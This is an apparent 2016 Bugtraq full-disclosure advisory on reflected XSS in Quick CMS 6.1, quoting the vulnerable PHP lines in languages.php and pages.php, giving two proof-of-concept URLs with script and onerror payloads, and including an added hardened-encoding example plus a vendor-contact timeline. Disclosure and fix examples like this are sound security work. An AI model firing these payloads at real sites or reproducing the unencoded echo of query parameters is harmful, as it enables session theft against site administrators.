Date: Tue, 19 Jan 2016 16:23:21 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: Quick CMS v 6.1 XSS Vulnerability

## FULL DISCLOSURE

#Product    : Quick CMS
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.1
#Home page Link  : http://opensolution.org/home.html
#Website    : 0x62626262.wordpress.com
#Linkedin   : https://in.linkedin.com/in/rahulpratapsingh94
#Date       : 19/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
The "sLangEdit" and "sSort" parameters are not sanitized, which leads to
reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: languages.php

Found at line: 23
<h1><?php echo $lang['Languages'].( isset( $_GET['sLangEdit'] ) ? ' '.$_GET['sLangEdit'] : null ); ?></h1>

File Name: pages.php

Found at line: 49
<form action="?p=pages<?php if( isset( $_GET['sSort'] ) ) echo '&amp;sSort='.$_GET['sSort']; ?>" name="form" method="post" class="main-form">
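
A hardened form of the two lines above, as an added example that is not part of the advisory or of the Quick.Cms code base. The helper names (h, stringParam, renderLanguagesHeading, renderPagesFormOpen) are hypothetical; the point is that each value is encoded for the context it lands in, and that array-valued parameters are discarded.

```php
<?php
// Added example, not Quick.Cms code. All function names are hypothetical.

/** Encode a value for HTML text or a quoted HTML attribute. */
function h( $value ){
  // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE keeps invalid
  // UTF-8 from turning the whole string into an empty result.
  return htmlspecialchars( (string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
}

/** Return a query parameter only when it is a plain string, else null. */
function stringParam( array $query, $name ){
  // ?sSort[]=x makes the value an array; treat that as "not supplied".
  return ( isset( $query[$name] ) && is_string( $query[$name] ) ) ? $query[$name] : null;
}

/** languages.php line 23: the value is placed in HTML body text. */
function renderLanguagesHeading( array $lang, array $query ){
  $edit = stringParam( $query, 'sLangEdit' );
  return '<h1>'.h( $lang['Languages'] ).( $edit !== null ? ' '.h( $edit ) : '' ).'</h1>';
}

/** pages.php line 49: the value is a URL query component inside an attribute. */
function renderPagesFormOpen( array $query ){
  $sort = stringParam( $query, 'sSort' );
  // First encode for the URL, then encode the finished URL for the attribute.
  $action = '?p=pages'.( $sort !== null ? '&sSort='.rawurlencode( $sort ) : '' );
  return '<form action="'.h( $action ).'" name="form" method="post" class="main-form">';
}

// Constructed inputs, modelled on the parameter values shown in the advisory.
$lang = array( 'Languages' => 'Languages' );
$samples = array(
  array( 'sLangEdit' => '</h1><script>alert("XSS")</script><h1>' ),
  array( 'sSort' => '"><img src=x onerror=confirm(1)><!--' ),
  array( 'sSort' => array( 'unexpected' ) ),
  array( 'sLangEdit' => 'en', 'sSort' => 'name' ),
);
foreach( $samples as $query ){
  echo renderLanguagesHeading( $lang, $query ), "\n";
  echo renderPagesFormOpen( $query ), "\n\n";
}
```

With the constructed inputs, the markup characters from the query string appear in the output only as entities or percent-escapes, so neither value can close the `<h1>` element or the `action` attribute.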

----------------------------------------
Exploit:
----------------------------------------
localhost/Quick.Cms_v6.1-en/admin.php?p=languages&sLangEdit=</h1><script>alert("XSS")</script><h1>

localhost/Quick.Cms_v6.1-en/admin.php?p=pages&sSort="><img%20src=x%20onerror=confirm(1)><!--

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc.png
https://0x62626262.files.wordpress.com/2016/01/quick-cms-v6-1xsspoc2.png


Disclosure Timeline:
Tried to contact vendor via email  : 14/1/2016 (email bounced back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016

Pub ref:
https://0x62626262.wordpress.com/2016/01/19/quick-cms-v-6-1-xss-vulnerability
